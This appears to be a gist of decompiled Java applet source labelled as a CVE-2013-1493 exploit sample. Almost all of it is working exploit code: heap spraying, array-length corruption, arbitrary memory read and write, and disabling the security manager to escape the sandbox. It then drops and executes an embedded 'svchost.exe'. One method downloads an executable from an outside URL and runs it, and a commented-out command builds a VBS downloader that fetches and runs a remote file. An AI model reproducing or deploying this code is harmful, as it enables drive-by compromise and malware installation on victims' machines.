
@hellok
Created March 18, 2013 13:04
CVE-2013-1493 exploit sample (decompiled), obtained from an online hex editor
/* */ import java.applet.Applet;
/* */ import java.awt.color.ColorSpace;
/* */ import java.awt.image.BufferedImage;
/* */ import java.awt.image.ColorConvertOp;
/* */ import java.awt.image.ColorModel;
/* */ import java.awt.image.ComponentColorModel;
/* */ import java.awt.image.ComponentSampleModel;
/* */ import java.awt.image.DataBuffer;
/* */ import java.awt.image.SampleModel;
/* */ import java.awt.image.WritableRaster;
import java.io.BufferedInputStream;
/* */ import java.io.File;
/* */ import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
/* */
/* */ public class ImAlpha extends Applet
/* */ {
/* */ private static final long serialVersionUID = 1L;
/* */ static final int ARRAY_MAGIC = -1341411317;
/* */ static final int ARRAY_OLDSIZE = 11;
/* */ static final int ARRAY_NEWSIZE = 2147483647;
/* */ static final int LEAK_MAGIC = -559035650;
/* */ static final int SPRAY_ARRAY_COUNT = 2808685;
/* */ static final int SPRAY_LEAK_COUNT = 2000000;
/* */ volatile ImAlpha.Leak[] _sleaks;
/* */ volatile int[][] _sarrays;
/* */ volatile int[] _bigArray;
/* */ int[] _memBaseObj;
/* */ long _memBaseIdx;
/* */ long _memBasePtr;
/* */ int[] soffsets;
/* */ int[] doffsets;
/* */
/* */ public ImAlpha()
/* */ {
/* 28 */ this.soffsets = new int[] { 0, 1, 2, 3 };
/* */
/* 31 */ this.doffsets = new int[] { 0, 1, 2, 50000000 };
/* */ }
/* */
/* */ void spray()
/* */ throws Exception
/* */ {
/* 37 */ Runtime.getRuntime().gc();
/* 38 */ Runtime.getRuntime().gc();
/* */
/* 40 */ this._sleaks = new ImAlpha.Leak[2000000];
/* 41 */ this._sarrays = new int[2808685][];
/* */ try
/* */ {
/* 44 */ for (int i = 0; i < this._sarrays.length; i++) {
/* 45 */ this._sarrays[i] = new int[11];
/* 46 */ for (int j = 0; j < this._sarrays[i].length; j++) {
/* 47 */ this._sarrays[i][j] = -1341411317;
/* */ }
/* */ }
/* */
/* 51 */ for (int i = 0; i < this._sleaks.length; i++)
/* 52 */ this._sleaks[i] = new ImAlpha.Leak("L");
/* */ }
/* */ catch (OutOfMemoryError localOutOfMemoryError)
/* */ {
/* */ }
/* */ }
/* */
/* */ void getBigArray()
/* */ throws Exception
/* */ {
/* 62 */ for (int i = 0; i < this._sarrays.length; i++) {
/* 63 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
/* 64 */ this._sarrays[i][j] = -1341411317;
/* */ }
/* */ }
/* */
/* 68 */ for (int i = 0; i < this._sarrays.length; i++) {
/* 69 */ if (this._sarrays[i].length != 2147483647) {
/* 70 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
/* 71 */ if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
/* 72 */ this._sarrays[i][(j - 1)] = 2147483647;
/* */ }
/* */ }
/* */ }
/* */ }
/* */
/* 78 */ for (int i = 0; i < this._sarrays.length; i++) {
/* 79 */ if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647))
/* */ continue;
/* 81 */ this._bigArray = this._sarrays[i];
/* */ }
/* */
/* 86 */ if (this._bigArray == null)
/* 87 */ throw new Exception("fail");
/* */ }
/* */
/* */ long getAddress(Object obj)
/* */ throws Exception
/* */ {
/* 93 */ for (int i = 0; i < this._bigArray.length; i++) {
/* 94 */ if (this._bigArray[i] == -559035650) {
/* 95 */ int flag = 0;
/* */
/* 97 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
/* 98 */ flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
/* */
/* 100 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
/* 101 */ flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
/* */
/* 103 */ if (flag == 2) {
/* 104 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
/* 105 */ return this._bigArray[(i + 1)];
/* */ }
/* */ }
/* */ }
/* */
/* 110 */ throw new Exception("fail");
/* */ }
/* */
/* */ void getMemBase()
/* */ throws Exception
/* */ {
/* 116 */ for (int i = 0; i < this._sarrays.length; i++) {
/* 117 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
/* 118 */ this._sarrays[i][j] = (j == 1 ? i : -1341411317);
/* */ }
/* */ }
/* */
/* 122 */ for (int i = 0; i < this._bigArray.length; i++) {
/* 123 */ if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
/* 124 */ int len = this._bigArray[(i - 1)];
/* 125 */ int idx = this._bigArray[(i + 1)];
/* 126 */ if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
/* 127 */ this._memBaseObj = this._sarrays[idx];
/* 128 */ this._memBaseIdx = i;
/* 129 */ break;
/* */ }
/* */ }
/* */ }
/* */
/* 134 */ if (this._memBaseObj == null) {
/* 135 */ throw new Exception("fail");
/* */ }
/* */
/* 138 */ this._memBasePtr = getAddress(this._memBaseObj);
/* */
/* 140 */ if (this._memBasePtr == 0L) {
/* 141 */ throw new Exception("fail");
/* */ }
/* */
/* 144 */ this._memBasePtr += 12L;
/* */ }
/* */
/* */ int rdMem(long addr)
/* */ {
/* 149 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
/* 150 */ if ((offs >= 0L) && (offs < 2147483647L)) {
/* 151 */ return this._bigArray[(int)offs];
/* */ }
/* 153 */ return 0;
/* */ }
/* */
/* */ void wrMem(long addr, int value)
/* */ {
/* 158 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
/* 159 */ if ((offs >= 0L) && (offs < 2147483647L))
/* 160 */ this._bigArray[(int)offs] = value;
/* */ }
/* */
/* */ void privileged()
/* */ {
/* */ try
/* */ {
/* 167 */ String Dir = new String("");
/* 168 */ Dir = System.getProperty("java.io.tmpdir");
/* */
/* 170 */ File f1 = new File(Dir + "svchost.exe");
/* */ try
/* */ {
/* 175 */ boolean b = f1.createNewFile();
/* */ }
/* */ catch (Exception e)
/* */ {
/* */ boolean b;
/* 180 */ e.printStackTrace();
/* */ }
/* */
/* 183 */ FileOutputStream outstream = new FileOutputStream(Dir + "svchost.exe");
/* */
/* 185 */ InputStream instream = ImAlpha.class.getResourceAsStream("svchost.cfg");
/* */
/* 187 */ int Mnocopploa = 0;
/* */
/* 190 */ while ((Mnocopploa = instream.read()) != -1)
/* */ {
/* 193 */ outstream.write(Mnocopploa);
/* */ }
/* */
/* 196 */ outstream.flush();
/* 197 */ outstream.close();
/* 198 */ instream.close();
/* */
/* 200 */ Runtime.getRuntime().exec(Dir + "svchost.exe");
/* */ } catch (Exception localException) {
/* 202 */ localException.printStackTrace();
/* */ }
/* */ }
public void privileged2() throws IOException
{
Process localProcess = null;
// String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " +
// "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe";
String command="calc.exe";
localProcess = Runtime.getRuntime().exec(command);
}
public void privileged1() throws IOException
{
Runtime.getRuntime().exec("calc");
URL localURL = new URL("http://www.bestoldgames.net/dosbox/download/DOSBox-0.63-install.exe");
HttpURLConnection localObject3 = (HttpURLConnection)localURL.openConnection();
int i = ((HttpURLConnection)localObject3).getContentLength();
String str2 = ((HttpURLConnection)localObject3).getContentType();
int j = ((HttpURLConnection)localObject3).getResponseCode();
if ((j == 200) && (str2.startsWith("application/")) && (i > 0))
{
InputStream localInputStream = ((HttpURLConnection)localObject3).getInputStream();
BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream);
byte[] arrayOfByte2 = new byte[i];
int k = 0;
int m = 0;
while (m < i)
{
k = localBufferedInputStream.read(arrayOfByte2, m, arrayOfByte2.length - m);
if (k == -1)
break;
m += k;
}
localBufferedInputStream.close();
if (m != i)
System.exit(0);
File localFile = File.createTempFile("~tmp", ".exe");
FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
localFileOutputStream.write(arrayOfByte2);
localFileOutputStream.flush();
localFileOutputStream.close();
Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });
}
}
/* */
/* */ public void init()
/* */ {
/* */ try
/* */ {
/* 212 */ if (System.getSecurityManager() == null) {
/* 213 */ privileged1();
/* 214 */ return;
/* */ }
/* */
/* 217 */ int sWidth = 168; int sHeight = 1;
/* 218 */ int spStride = 4; int ssStride = spStride * sWidth;
/* */
/* 220 */ int dWidth = sWidth; int dHeight = sHeight;
/* 221 */ int dpStride = 1; int dsStride = 0;
/* */
/* 223 */ ColorSpace scs = new ImAlpha.MyColorSpace(0, this.soffsets.length - 1);
/* 224 */ ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
/* 225 */ SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
/* 226 */ BufferedImage sbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
/* */
/* 228 */ for (int i = 0; i < ssStride; i++) {
/* 229 */ sbi.getRaster().getDataBuffer().setElem(i, 1);
/* */ }
/* */
/* 232 */ ColorSpace dcs = new ImAlpha.MyColorSpace(0, this.doffsets.length - 1);
/* 233 */ ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
/* 234 */ SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
/* 235 */ BufferedImage dbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
/* */
/* 237 */ ColorConvertOp cco = new ColorConvertOp(null);
/* */
/* 239 */ spray();
/* */ try
/* */ {
/* 242 */ cco.filter(sbi, dbi);
/* */ }
/* */ catch (Exception localException) {
/* */ }
/* 246 */ getBigArray();
/* */
/* 248 */ getMemBase();
/* */
/* 250 */ long sys = getAddress(System.class);
/* 251 */ long sm = getAddress(System.getSecurityManager());
/* 252 */ sys = rdMem(sys + 4L);
/* 253 */ for (int i = 0; i < 2000000; i++) {
/* 254 */ long addr = sys + i * 4;
/* 255 */ int val = rdMem(addr);
/* 256 */ if (val == sm) {
/* 257 */ wrMem(addr, 0);
/* 258 */ if (System.getSecurityManager() == null) {
/* */ break;
/* */ }
/* */ }
/* */ }
/* 263 */ privileged1();
/* */ }
/* */ catch (Exception localException1)
/* */ {
/* */ }
/* */ }
/* */
/* */ public static void main(String[] args) {
/* 271 */ new ImAlpha().init();
/* */ }
/* */
/* */ class MyColorSpace extends ColorSpace
/* */ {
/* */ private static final long serialVersionUID = 1L;
/* */
/* */ public MyColorSpace(int type, int numcomponents)
/* */ {
/* 341 */ super(type, numcomponents); }
/* 342 */ public float[] fromCIEXYZ(float[] value) { return null; }
/* 343 */ public float[] toCIEXYZ(float[] value) { return null; }
/* 344 */ public float[] fromRGB(float[] value) { return null; }
/* 345 */ public float[] toRGB(float[] value) { return null;
/* */ }
/* */ }
/* */
/* */ class MyBufferedImage extends BufferedImage
/* */ {
/* */ int _fakeType;
/* */ ColorModel _fakeColorModel;
/* */ SampleModel _fakeSampleModel;
/* */
/* */ public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
/* */ {
/* 297 */ super(width, height, imageType);
/* */
/* 299 */ this._fakeType = fakeType;
/* 300 */ this._fakeColorModel = fakeColorModel;
/* 301 */ this._fakeSampleModel = fakeSampleModel;
/* */ }
/* */
/* */ public int getType()
/* */ {
/* 306 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 307 */ if (caller.contains("ICC_Transform.getImageLayout(")) {
/* 308 */ return this._fakeType;
/* */ }
/* */
/* 311 */ return super.getType();
/* */ }
/* */
/* */ public ColorModel getColorModel()
/* */ {
/* 316 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 317 */ if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
/* 318 */ return this._fakeColorModel;
/* */ }
/* */
/* 321 */ return super.getColorModel();
/* */ }
/* */
/* */ public SampleModel getSampleModel()
/* */ {
/* 326 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 327 */ if (caller.contains("ICC_Transform.getImageLayout(")) {
/* 328 */ return this._fakeSampleModel;
/* */ }
/* */
/* 331 */ return super.getSampleModel();
/* */ }
/* */ }
/* */
/* */ class Leak
/* */ {
/* */ public volatile int magic;
/* */ public volatile Object obj;
/* */ public volatile Object obj2;
/* */ public volatile Object obj3;
/* */ public volatile Object obj4;
/* */
/* */ public Leak(Object o)
/* */ {
/* 284 */ this.magic = -559035650;
/* 285 */ this.obj = o;
/* */ }
/* */ }
/* */ }
/* Location: E:\360云盘\POC_linux_also\sample\CVE-2013-1493_sample\OK.jar
* Qualified Name: ImAlpha
* JD-Core Version: 0.6.0
*/